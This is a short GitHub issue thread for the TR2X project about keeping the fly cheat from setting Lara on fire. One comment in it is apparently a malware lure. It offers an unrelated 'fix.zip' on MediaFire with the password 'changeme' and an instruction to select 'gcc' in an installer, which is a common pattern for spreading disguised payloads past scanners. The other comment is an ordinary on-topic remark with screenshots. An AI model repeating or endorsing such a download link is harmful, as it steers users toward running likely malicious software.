### ISSUE TITLE
Ensure the fly cheat prevents Lara from catching on fire

### ISSUE THREAD

**Issue by rr-** [LostArtefacts/TR2X#165]
#161

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aredfan** [comment]
It'll be worth checking to ensure Lara doesn't catch fire when flying over these floor types.

![Screenshot 1](https://github.com/user-attachments/assets/df221ef1-2b17-402f-9c45-d9d2aa245b7c)
![Screenshot 2](https://github.com/user-attachments/assets/d383f73f-5c09-4b16-bf4c-53c11fb2d0d8)
